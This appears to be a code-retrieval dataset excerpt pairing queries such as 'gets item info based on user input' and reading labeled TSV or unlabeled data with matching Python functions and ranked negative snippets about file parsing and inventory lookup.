query
stringlengths 9
9.05k
| document
stringlengths 10
222k
| metadata
dict | negatives
listlengths 30
30
| negative_scores
listlengths 30
30
| document_score
stringlengths 4
10
| document_rank
stringclasses 2
values |
---|---|---|---|---|---|---|
gets item info based on user input
|
def item_info():
item_code = get_input("Enter item code: ")
if item_code in FULL_INVENTORY:
print_dict = FULL_INVENTORY[item_code]
output = ""
for key, value in print_dict.items():
output += ("{}:{}{}".format(key, value, "\n"))
else:
output = "Item not found in inventory"
print(output)
return output
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def iteminfo():\n itemcode = input(\"Enter item code: \")\n if itemcode in FULLINVENTORY:\n printdict = FULLINVENTORY[itemcode]\n for key, value in printdict.items():\n print(\"{}:{}\".format(key, value))\n else:\n print(\"Item not found in inventory\")",
"def item(self, item_name):\n\tself.log.info('Not implemented yet... Sorry!')\n\tpass",
"def getInfo(self,item):\r\n return ''",
"async def iteminfo(self, ctx, *, item: str):\n items = await self.bot.di.get_guild_items(ctx.guild)\n item = items.get(item)\n if not item:\n await ctx.send(await _(ctx, \"Item doesnt exist!\"))\n return\n if hasattr(item, \"description\"):\n embed = discord.Embed(title=item.name, description=item.description, color=randint(0, 0xFFFFFF),)\n else:\n embed = discord.Embed(title=item.name, color=randint(0, 0xFFFFFF),)\n\n embed.set_author(name=ctx.guild.name, icon_url=ctx.guild.icon_url)\n embed.add_field(name=await _(ctx, \"Name\"), value=item.name)\n img = item.meta.get(\"image\")\n embed.set_thumbnail(url=str(img)) if img else None\n for key, value in item.meta.items():\n if key == \"image\":\n continue\n embed.add_field(name=key, value=value)\n\n await ctx.send(embed=embed)",
"def get_item_input(self, varname, collection):\n item = self.get_ascii_input(varname)\n if item not in collection:\n raise MKUserError(varname, _(\"The requested item %s does not exist\") % item)\n return collection[item], item",
"def do_list_items(self, arg):\n try:\n cprint (\"These are your items: \\n\", 'blue')\n my_items = arg[\"<all_items>\"]\n choice = arg[\"--choice\"]\n if choice == \"name\":\n my_items_str = \" \".join(my_items)\n print(my_items_str)\n elif choice == \"id\":\n my_items_str = int(\" \".join(my_items))\n print (my_items_str)\n app.ToDoApp.to_view_items(my_items_str)\n \n\n\n \n except ValueError as e:\n cprint((e), 'red')",
"def __getitem__(self, item):\n result = self._get_raw_input()[item]\n return result[0] if isinstance(result, list) else result",
"def get_item_detail(item_id):\n pass",
"def choose_item():\n print_items()\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n while True:\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == 'blueprint':\n blueprint = ViewMap()\n blueprint.print_map()\n print(\"Type 'back' to go to main menu.\")\n else:\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n else:\n print(\"Type 'back' to go to main menu.\")",
"def parse_item_page_info(self, id, body):\n info = {}\n info['title'] = self.__re_search(body, *self.regx['title'])\n if info['title'] == 'Suggested Products':\n return None\n info['model'] = self.__re_search(body, *self.regx['model'])\n if self.__re_search(body, *self.regx['deactivated']):\n info['deactivated'] = True\n return info\n free_shipping = self.__re_search(body, *self.regx['free_shipping'])\n cart = self.__re_search(body, *self.regx['cart'])\n if free_shipping and not cart:\n info.update(self.parse_item_page_price(id, body))\n return info",
"def read_item(item_name, catagory_name):\n item = Item.fetch_by_name_and_catagory_name(item_name, catagory_name)\n return render_template('item.html', item=item)",
"def get_item_info(self, item_id):\n request_name = \"get_shop_info\"\n\n items = self.make_request(request_name, url_id=item_id)\n try:\n item = items[0]\n item_dict = dict()\n item_dict[\"id\"] = item[\"@id\"].encode('utf-8')\n item_dict[\"name\"] = item[\"label\"].encode('utf-8')\n item_dict[\"shelf\"] = item[\"shelf\"].encode('utf-8')\n item_dict[\"slot\"] = item[\"slot\"].encode('utf-8')\n item_dict[\"quantity\"] = item[\"quantity\"]\n return item_dict\n except Exception as e:\n print(\"Encountered exception while getting item\", item_id, \"\\n\", str(e))\n return None",
"def selectItem(*args):",
"def Restaurant_get_info() -> Restaurant:\r\n name = input(\"Please enter the restaurant's name: \")\r\n cuisine = input(\"Please enter the kind of food served: \")\r\n phone = input(\"Please enter the phone number: \")\r\n menu = menu_enter()\r\n return Restaurant(name, cuisine, phone, menu)",
"def choose_inventory() -> list:\r\n print(\"What weapon would you like to start with? Enter the corresponding number\\n(1) Blaster Pistol\\n\"\r\n \"(2) Blaster Rifle\\n(3) Assault Cannon\\n(4) Sniper Rifle\\n\")\r\n item_list = [\"Blaster Pistol\", \"Blaster Rifle\", \"Assault Cannon\", \"Sniper Rifle\"]\r\n user_input = str(input())\r\n if user_input == \"1\":\r\n return [item_list[0]]\r\n elif user_input == \"2\":\r\n return [item_list[1]]\r\n elif user_input == \"3\":\r\n return [item_list[2]]\r\n elif user_input == \"4\":\r\n return [item_list[3]]\r\n else:\r\n print(\"Please enter a valid item number\")\r\n choose_inventory()",
"def process_items():\n global HAS_WATCH\n global HAS_FIRST_AID_KIT\n global HAS_FLASHLIGHT\n global HAS_RAINCOAT\n global HAS_COMPASS\n global HAS_BEARTRAP\n\n if \"Watch\" in ITEMS:\n HAS_WATCH = True\n if \"First Aid Kit\" in ITEMS:\n HAS_FIRST_AID_KIT = True\n if \"Flashlight\" in ITEMS:\n HAS_FLASHLIGHT = True\n if \"Raincoat\" in ITEMS:\n HAS_RAINCOAT = True\n if \"Compass\" in ITEMS:\n HAS_COMPASS = True\n if \"Bear Trap\" in ITEMS:\n HAS_BEARTRAP = True\n\n # Stupid little hack to provide 'immediate updates/effect' of having the below items\n if HAS_WATCH:\n update_title_area(\" Day: %d Time: %d:00 \" % (DAY, TIME))\n if HAS_COMPASS:\n DISCOVERED[ZERO_BASE_PLYR_POS] = \"Y\"",
"def main():\n catalogue = Catalogue()\n\n # book1 = Book(\"title1\", 22323, \"author\", 4)\n # dvd1 = Dvd(\"dvdt\", 1111, \"jurassic\", 2, \"sept 2\", \"japan\")\n # catalogue.add_item(book1)\n # catalogue.add_item(dvd1)\n\n while True:\n print(\"\"\" ======LIBRARY MENU=======\n 1. Add Item\n 2. Remove item \n 3. Display all items\n 4. Checkout item \n 5. Return item \n 6. Find item \n 7. Exit\n \"\"\")\n choice = int(input(\"Enter Choice:\"))\n if choice == 1:\n catalogue.add_item(catalogue)\n elif choice == 2:\n user_input = int(input(\"enter call number: \"))\n catalogue.remove_item(user_input)\n elif choice == 3:\n catalogue.display_available_items()\n elif choice == 4:\n user_input = int(input(\"enter call number: \"))\n catalogue.check_out(user_input)\n elif choice == 5:\n user_input = int(input(\"enter call number: \"))\n catalogue.return_item(user_input)\n elif choice == 6:\n user_input = input(\"enter title to search: \").capitalize()\n catalogue.search(user_input)\n if choice == 7:\n sys.exit()",
"def find_item(self, utterance, rasa_output):\n item = \"\" # This is the variable that will hold the item\n split_utterance = utterance.lower().split(\" \") # Split the user's input\n split_rasa_output = \" \".join(rasa_output.lower().split(\"?\")).split(\" \") # Split Rasa's output\n\n items = [item for item in split_rasa_output if item == \"music\" \n or item == \"heating\" or item == \"tv\" or item == \"light\"] # Identify the relevant items from Rasa's output]\n # Identifies the item to be chosen from the user input\n if (\"music\" in split_utterance):\n item = \"music\"\n elif (\"tv\" in split_utterance or \"television\" in split_utterance or \"telly\" in split_utterance):\n item = \"tv\"\n elif (\"heating\" in split_utterance):\n item = \"heating\"\n elif (\"lights\" in split_utterance or \"light\" in split_utterance):\n item = \"lights\"\n elif (\"first\" in split_utterance): \n item = items[0]\n elif (\"second\" in split_utterance): \n item = items[1]\n elif (\"third\" in split_utterance or \"last\" in split_utterance): \n item = items[2]\n else:\n return None\n\n return item",
"def execute_factory_menu(cls) -> LibraryItemFactory:\n print(\"Item Loader\")\n print(\"-----------\")\n print(\"What kind of items would you like to load?\")\n print(\"1. Manga\")\n print(\"2. Games\")\n print(\"3. Movies\")\n user_choice = int(input(\"Enter your choice (1-3):\"))\n factory = cls.factory_map[user_choice]\n path = input(\"Enter a path: \")\n return factory(path)",
"def item():\n return {'name':'box',\n 'value':340}",
"def parse_items(self):",
"def Item(self) -> str:",
"def Item(self) -> str:",
"def Item(self) -> str:",
"def get_menu_item(menu_item_name):\n\n pass",
"def test_get_item_details(self, mock_requests_get):\n details = resources.get_item_details(21787)\n\n item = details.item\n assert item.id == 21787\n assert item.name == \"Steadfast boots\"\n assert item.type == \"Miscellaneous\"\n assert item.current.price == 5900000\n assert item.today.price == -138200\n assert item.members is True",
"def request_item(date_in, loc_in, item_in, meal_in, requisites):\n secrets = get_secrets()\n url = secrets.get('m_dining_api_main')\n location = '&location='\n date = '&date='\n meal = '&meal='\n\n #API url concatenation\n location += loc_in\n date += str(date_in)\n url = url + location + date + meal\n url = remove_spaces(url)\n\n if meal_in == '':\n meal_entered = False\n else:\n meal_entered = True\n\n #fetching json\n data = requests.get(url).json()\n\n possible_matches = []\n\n #Loop through meals\n for i in data['menu']['meal']:\n\n #If meal specified, only check specified meal\n if meal_entered and i['name'].upper() != meal_in.upper():\n continue\n #Skip meal if no food items available\n if 'course' not in i:\n continue\n\n #Loop through food items in course\n for j in i['course']:\n for key, value in j.items():\n if key == 'name':\n course_data = j['menuitem']\n meal_name = i['name']\n #Append matches to specified item to possible_matches list\n possible_matches = find_matches(course_data, possible_matches,\n item_in, meal_name, requisites)\n \n #Specified item found\n if possible_matches:\n possible_matches = find_item_formatting(possible_matches)\n text = 'Yes, there is '\n for i in range(len(possible_matches)):\n if len(possible_matches) > 1 and (i == len(possible_matches) - 1):\n text += ' and'\n text += ' ' + possible_matches[i]\n if i != len(possible_matches) - 1:\n text += ','\n\n #Specified item not found\n else:\n text = 'Sorry, that is not available'\n\n\n return {'fulfillmentText': text}",
"def getItemFromAisle(self):\n category_items = {\"0\": None}\n choice = None\n\n # While not exit\n while choice != \"0\": \n self.cart.refreshCartDF()\n self.updateAisleData()\n \n # Add items from a category into a dictionary to refer to.\n for i, item in enumerate(self.aisle_data.values):\n category_items[f\"{i+1}\"] = [item[0], item[1], int(item[2])] #[Item, price, stock]\n clear()\n\n \"\"\"\n 0) Don't add item to cart\n\n Items Price In stock\n 1) Chicken $5.20 14\n \"\"\"\n print(print_banner(self.name, self.aisle_name))\n print(\"The items on the shelves stare back at you...\")\n print(\"0) Don't add item to cart\\n\")\n print(\" Items Price In stock\")\n for i, item in enumerate(self.aisle_data.values):\n # option_num) Item, price, stock\n print(f\"{i+1}) {item[0]}{get_spaces(12-len(item[0]))} ${item[1]}{get_spaces(7-len(str(item[1])))} {int(item[2])}\") \n\n choice = input(\"\\nAdd an item to cart?\\n\")\n clear()\n print(print_banner(self.name, self.aisle_name))\n if choice == \"\":\n print(\"Please enter something!\")\n elif choice == \"0\":\n break\n elif choice in category_items: # Item chosen to add to cart\n while True: # Check if valid number added to cart\n clear()\n print(print_banner(self.name, self.aisle_name))\n print(f\"Selected item: \\033[1;33;40m{category_items[choice][0]} ({category_items[choice][2]})\\033[0;37;40m\\n\")\n amt = input(\"Number to add (0 to stop): \").strip()\n\n if amt == \"\" :\n print(\"Please enter an amount!\")\n enter_to_continue()\n continue\n elif amt.isnumeric():\n amt = int(amt)\n else:\n amt = -1\n if amt > category_items[choice][2]:\n print(\"That's too many!\")\n enter_to_continue()\n continue\n elif amt >= 0:\n break\n print(\"Invalid option!\")\n enter_to_continue()\n if amt == 0: # Don't add anything\n pass\n else:\n category_items[choice][2] -= amt\n self.cart.addItemToCart(category_items[choice][0], amt, category_items[choice][1]*amt, get_time())\n print(f\"Added {amt} {category_items[choice][0]} to cart\")\n enter_to_continue()\n else:\n print(\"Invalid option!\")\n enter_to_continue()",
"def getListItem(*args):",
"def getListItem(*args):"
] |
[
"0.7300795",
"0.67402464",
"0.6617127",
"0.65622824",
"0.62993705",
"0.6286386",
"0.6192564",
"0.6170643",
"0.61119014",
"0.61083364",
"0.61015826",
"0.6098515",
"0.6002422",
"0.60008955",
"0.5988962",
"0.5985847",
"0.59783155",
"0.5960772",
"0.5948382",
"0.59276307",
"0.59144765",
"0.59136546",
"0.59136546",
"0.59136546",
"0.59112847",
"0.59052825",
"0.58933926",
"0.5890285",
"0.588357",
"0.588357"
] |
0.7121636
|
1
|
Reads the labeled data described in tsv file. The returned object contains three fields that represent the unlabeled data.
|
def read_tsv(data_loc, fname):
tf = codecs.open(data_loc + fname, 'r', encoding='utf-8')
data = []
labels = []
fnames = []
for line in tf:
(ifname, label) = line.strip().split("\t")
content = read_instance(data_loc, ifname)
labels.append(label)
fnames.append(ifname)
data.append(content)
tf.close()
return data, fnames, labels
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def load_from_tsv(tsv_file):\n # Load data from files\n all_examples = list(open(tsv_file, \"r\", encoding='utf-8').readlines())\n split_lines = [l.split('\\t') for l in all_examples]\n x_text = [clean_str(s[0].strip()) for s in split_lines]\n label_integers = [int(s[1].strip()) for s in split_lines]\n label_values = list(set(label_integers))\n if len(label_values) > 2 or min(label_values) != 0 or max(label_values) != 1:\n raise Exception('Labels are not in correct format {0} {1}'.format(label_values[0], label_values[1]))\n y = np.array([[0, 1] if l == 1 else [1, 0] for l in label_integers])\n return [x_text, y]",
"def load_data():\n categories = {}\n\n # Sorry: This is lazy file reading.\n f = open(TSV, 'r')\n for line in f.readlines()[1:]:\n line = line.strip()\n\n if not line or line.startswith(('id', '#')):\n continue\n\n # It's tab-delimited, so split on tabs.\n line = line.split('\\t')\n categories.setdefault(line[1], []).append(line)\n\n return categories",
"def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)",
"def load_data(self):\n with open(self.file_name) as f:\n lines = f.readlines()\n\n labels = list()\n all_dat = list()\n for i, l in enumerate(lines):\n\n labels.append(int(l[0]))\n\n l = gensim.utils.any2unicode(l)\n all_dat.append(LabeledSentence(l.split(\"\\t\")[-1], [i]))\n\n return all_dat, np.asarray(labels)",
"def _read_tsv(cls, input_file):\n with open(input_file, \"r\", encoding=\"cp1252\") as f:\n pre_lines = f.readlines()\n post_lines = []\n for line in pre_lines:\n post_lines.append(line.strip().split(\"\\t\"))\n return post_lines",
"def read_data(feature_file, label_file):",
"def readdata(self, fname):\n\t\treturn self.__readtsv(fname)",
"def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n return readfile(input_file)",
"def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def load_x_from_tsv(tsv_file):\n # Load data from files\n all_examples = list(open(tsv_file, \"r\", encoding='utf-8').readlines())\n split_lines = [l.split('\\t') for l in all_examples]\n x_text = [clean_str(s[0].strip()) for s in split_lines]\n return x_text",
"def load_rd_uv(in_file):\n uv_data = np.load(in_file)\n return uv_data['ucs'], uv_data['vcs']",
"def load_tsv(path: str, ncols: int, nonames: bool) -> DataFrame:\n cols = range(ncols) if ncols else None\n return pandas.read_csv(path, usecols=cols, sep='\\t', skipinitialspace=True, header='infer' if not nonames else None)",
"def _parse_tsv_vocab_file(self, vocab_file: str):\n with open(vocab_file, \"r\", encoding=\"utf-8\") as f:\n for (index, line) in enumerate(f):\n title, count = line.rstrip().split(\"\\t\")\n entity = Entity(title, None)\n self.vocab[entity] = index\n self.counter[entity] = int(count)\n self.inv_vocab[index] = [entity]",
"def _read_node_file(self):\n self.node_df = gt.remove_colons(pd.read_csv(self.node_file, dtype=str))",
"def from_label_file(cls, label_file_path, out_path=FEATURES_DATA_PATH, source_path=RAW_DATA_PATH):\n df = pd.read_csv(label_file_path)\n filenames = df['filename']\n labels = df['label']\n return cls(filenames, labels, out_path=out_path, source_path=source_path)",
"def _read_tsv(file_path):\n translation_pairs = []\n with file_path.open() as f:\n # Note: the correct way to do this is with csv.DictReader, but some examples\n # have quote characters that confuse the csv parser. Since we know the\n # source never has its own tab or newline characters, basic Python string\n # manipulation is fine here, as long as the model doesn't predict tabs or\n # newlines.\n for line in f:\n line = line.strip()\n line = line.split('\\t')\n if len(line) != 2:\n raise ValueError(\n f'Line {line} could not be parsed. You may need to manually '\n 'replace tab or newline characters in the model output with '\n 'spaces.'\n )\n source, translation = line\n translation_pairs.append(\n evaluation.TranslationPair(source=source, translation=translation)\n )\n return translation_pairs",
"def load_data(self):\n \n # only loader implemented so far !\n try:\n _ascii_array = Utilities.load_ascii(filename=self.filename, sep='')\n start_row = TOF._first_line_number_with_real_data(_ascii_array[0, 0])\n\n _tof_column = _ascii_array[start_row:, 0]\n\n if not TOF._is_this_numeric(_tof_column[0]):\n start_row += 1\n\n _tof_column = _ascii_array[start_row:, 0]\n _counts_column = _ascii_array[start_row:, 1]\n\n self.tof_array = _tof_column\n self.counts_array = _counts_column\n return\n\n except IndexError:\n pass # try another format\n\n try:\n _ascii_array = Utilities.load_ascii(filename=self.filename, sep=',')\n start_row = TOF._first_line_number_with_real_data(_ascii_array[0, 0])\n\n _tof_column = _ascii_array[start_row:, 0] # first row must be excluded in this format\n\n if not TOF._is_this_numeric(_tof_column[0]):\n start_row += 1\n\n _tof_column = _ascii_array[start_row:, 0]\n _counts_column = _ascii_array[start_row:, 1]\n\n self.tof_array = _tof_column\n self.counts_array = _counts_column\n return\n\n except IndexError:\n raise IndexError(\"Format not implemented!\")",
"def _read_tsv(cls, input_file, quotechar=None):\n df = pd.read_csv(input_file, sep=\"\\t\", header=None)\n return df.values.tolist()",
"def data_parser(data):\n\n with open(data, 'r') as inp:\n\n # take every sample\n # the last line in the text file is empty, so reading until -1\n samples = inp.read().split('\\n')[:-1]\n\n vec = []\n labels = []\n for sample in samples:\n # file is tab delimited\n split_samples = sample.split('\\t')\n # last column contains the label\n labels.append(int(split_samples[-1]))\n\n features = []\n for feature in split_samples[:-1]:\n features.append(float(feature))\n vec.append(features)\n\n # make the features and labels as a numpy array\n vec = np.array(vec)\n labels = np.array(labels)\n return vec, labels",
"def _read_local(self):\n\n self.attributions = np.genfromtxt(\n self.attributions_path, dtype=float, delimiter=\",\", skip_header=1\n )\n\n with open(self.attributions_path) as attribution_file:\n self.feature_labels = next(csv.reader(attribution_file))",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in f.readlines():\n # if sys.version_info[0] == 2:\n # line = list(cell.decode('utf-8') for cell in line)\n lines.append(line.strip().split('\\t'))\n return lines",
"def read_sensaldo(tsv=\"sensaldo-base-v02.txt\", verbose=True):\n\n if verbose:\n util.log.info(\"Reading TSV lexicon\")\n lexicon = {}\n\n with open(tsv) as f:\n for line in f:\n if line.lstrip().startswith(\"#\"):\n continue\n saldoid, label = line.split()\n lexicon[saldoid] = label\n\n testwords = [\"förskräcklig..1\",\n \"ödmjukhet..1\",\n \"handla..1\"\n ]\n util.test_annotations(lexicon, testwords)\n\n if verbose:\n util.log.info(\"OK, read\")\n return lexicon",
"def tsv_value(self):\n return self.tsv_file.getvalue()",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines",
"def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n # if sys.version_info[0] == 2:\n # line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines",
"def load_data_part(fname):\n if \"_data\" not in fname:\n return None\n # Read data\n data = pd.read_csv(fname)\n # events file\n events_fname = fname.replace('_data', '_events')\n # read event file\n labels = pd.read_csv(events_fname)\n clean = data.drop(['id'], axis=1) # remove id\n labels = labels.drop(['id'], axis=1) # remove id\n return clean, labels",
"def read_unlabeled(data_loc, dname):\n data = []\n fnames = []\n raw_fnames = os.listdir(data_loc + dname)\n for raw_fname in raw_fnames:\n fname = dname + '/' + raw_fname\n content = read_instance(data_loc, fname)\n data.append(content)\n fnames.append(fname)\n return data, fnames",
"def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines"
] |
[
"0.6495935",
"0.5876787",
"0.586421",
"0.5856266",
"0.5749008",
"0.57244563",
"0.57199895",
"0.57068723",
"0.56794715",
"0.56793076",
"0.56583524",
"0.5629123",
"0.5584531",
"0.55555147",
"0.5524185",
"0.5507425",
"0.5448873",
"0.54281646",
"0.542447",
"0.541013",
"0.540003",
"0.53788555",
"0.5376533",
"0.53414196",
"0.53319013",
"0.53302175",
"0.5314296",
"0.5304937",
"0.53040534",
"0.530193"
] |
0.6444849
|
1
|
Reads the unlabeled data. The returned object contains two fields that represent the unlabeled data.
|
def read_unlabeled(data_loc, dname):
data = []
fnames = []
raw_fnames = os.listdir(data_loc + dname)
for raw_fname in raw_fnames:
fname = dname + '/' + raw_fname
content = read_instance(data_loc, fname)
data.append(content)
fnames.append(fname)
return data, fnames
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _load_unlabeled(self, path):\n signal, info = wfdb.rdsamp(path)\n self.fs = 250\n self.lead_match = ['anonymous1', 'anonymous2']\n self.raw_data = np.transpose(np.array([signal]), (2, 0, 1))\n self.symbol = []\n self.coords = []\n self.label_name = None\n self._generate_beatlabel_from_estimation()",
"def _read_train_datas(self):\r\n with open(self.train_label_path, 'r') as fb:\r\n lines = fb.readlines()\r\n return self._parse_raw_labels(lines)",
"def get_raw_data():\n\twith open('train_label.pkl', 'rb') as f:\n\t\ttrain_label = pickle.load(f)\n\n\twith open('train_image.pkl', 'rb') as f:\n\t\ttrain_data = pickle.load(f)\n\n\tprint(np.unique(np.asarray(train_label)))\n\n\treturn (train_label, np.asarray(train_data))",
"def read_raw_data(self):\n dat_file = os.path.join(DATA_DIR, self.patient_number + '.txt')\n if not os.path.exists(dat_file):\n raise AssertionError(\"{} doesn't exist.\".format(dat_file))\n time = []\n voltage1 = []\n voltage2 = []\n with open(dat_file, 'r') as fd:\n for line in fd:\n line = line.split()\n time.append(line[0])\n voltage1.append(float(line[1]))\n voltage2.append(float(line[2]))\n\n tags_file = os.path.join(DATA_DIR, self.patient_number + '_tag.txt')\n if not os.path.exists(dat_file):\n raise AssertionError(\"{} doesn't exist.\".format(tags_file))\n tags_time = []\n tags = []\n r_peaks_indexes = []\n with open(tags_file, 'r') as fd:\n for line in fd:\n line = line.split()\n tags_time.append(line[0])\n tags.append(line[2])\n r_peaks_indexes.append(int(line[1]))\n return time, voltage1, voltage2, tags_time, tags, r_peaks_indexes",
"def read_data(feature_file, label_file):",
"def load_data(self):\n with open(self.file_name) as f:\n lines = f.readlines()\n\n labels = list()\n all_dat = list()\n for i, l in enumerate(lines):\n\n labels.append(int(l[0]))\n\n l = gensim.utils.any2unicode(l)\n all_dat.append(LabeledSentence(l.split(\"\\t\")[-1], [i]))\n\n return all_dat, np.asarray(labels)",
"def _read_local(self):\n\n self.attributions = np.genfromtxt(\n self.attributions_path, dtype=float, delimiter=\",\", skip_header=1\n )\n\n with open(self.attributions_path) as attribution_file:\n self.feature_labels = next(csv.reader(attribution_file))",
"def read_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']",
"def get_labels(self):\n\n print 'Loading label data from', self.label_file, '...'\n labels = {}\n with open(self.label_file, 'rb') as f:\n f.next() # skip header line\n for line in f:\n index, answer = line.rstrip('\\n').split(',')\n labels[index] = answer\n\n return labels",
"def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)",
"def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)",
"def test_read_data_unlabeled(self):\n references = pre.read_data(self.testfilename)\n truth = [\n [Reference(0, 'm jones', \n 'symbol intersect detect method improv spatial intersect join', \n ['e rundensteiner', 'y huang'], 'geoinformatica', None),\n Reference(1, 'matthew c jones', \n 'improv spatial intersect join symbol intersect detect', \n ['e rundensteiner', 'h kuno', 'p marron', 'v taube', 'y ra'], \n 'sigmodels.intern manag data', None),\n Reference(2, 'matthew c jones',\n 'view materi techniqu complex hirarch object', ['e rundensteiner',\n 'y huang'], 'ssd symposium larg spatial databas', None)],\n [Reference(3, 'mike w miller', 'domin draw bipartit graph', \n ['l berg'], 'sigucc special interest group univers comput servic',\n None),\n Reference(4, 'mike w miller', 'rel compromis statist databas', \n [], 'sigucc special interest group univers comput servic', None)],\n [Reference(5, 'c chen', 'formal approach scenario analysi',\n ['d kung', 'j samuel', 'j gao', 'p hsia', 'y toyoshima'],\n 'ieee softwar', None)],\n [Reference(6, 'jane j robinson', 'discours code clue context', [], \n 'acl meet the associ comput linguist', None),\n Reference(7, 'jane j robinson', 'diagram grammar dialogu', [],\n 'cooper interfac inform system', None)],\n [Reference(8, 'a gupta', 'iri h java distanc educ', ['a gonzalez', \n 'a hamid', 'c overstreet', 'h wahab', 'j wild', 'k maly', 's ghanem',\n 'x zhu'], 'acm journal educ resourc comput', None)],\n [Reference(9, 'mary d brown',\n 'intern redund represent limit bypass support pipelin adder regist'\n 'file', ['y patt'], 'proceed the th ieee intern symposium high '\n 'perform comput architectur hpca intern symposium high perform '\n 'comput architectur talk slide', None)]]\n self.assertEquals(references, truth)",
"def load_data(self) -> tuple:\n label_num = {}\n data_set = pathlib.Path(self.path)\n data = []\n\n # create the label lookup dict for verifcation later\n for i, v in enumerate(data_set.iterdir()):\n label_num[v.name] = i\n self.labels[i] = v.name\n # end\n\n # read images\n for img_path in data_set.rglob(\"*.jpg\"):\n lbl = label_num[str(img_path.parent.stem)]\n img = cv2.imread(str(img_path))\n img = cv2.resize(img, self.dims, interpolation=cv2.INTER_AREA)\n\n # flatten RGB data into a vector\n # NOTE: NOT ACTUALLY NECESSARY! \n img.flatten()\n\n # label the sample and append to temp data list\n sample = np.append(lbl, img)\n data.append(sample)\n # end\n\n # partition and package the data (*_ ensures safe unpacking)\n train, test, validate, *_ = Data.partition(data, self.parts, 0.7, 0.2)\n self.train = Data(train)\n self.test = Data(test)\n self.validate = Data(validate)",
"def _read_data(self):",
"def read_raw_data(self):\n # Must be set by the user\n raise Exception(\"not implemented\")",
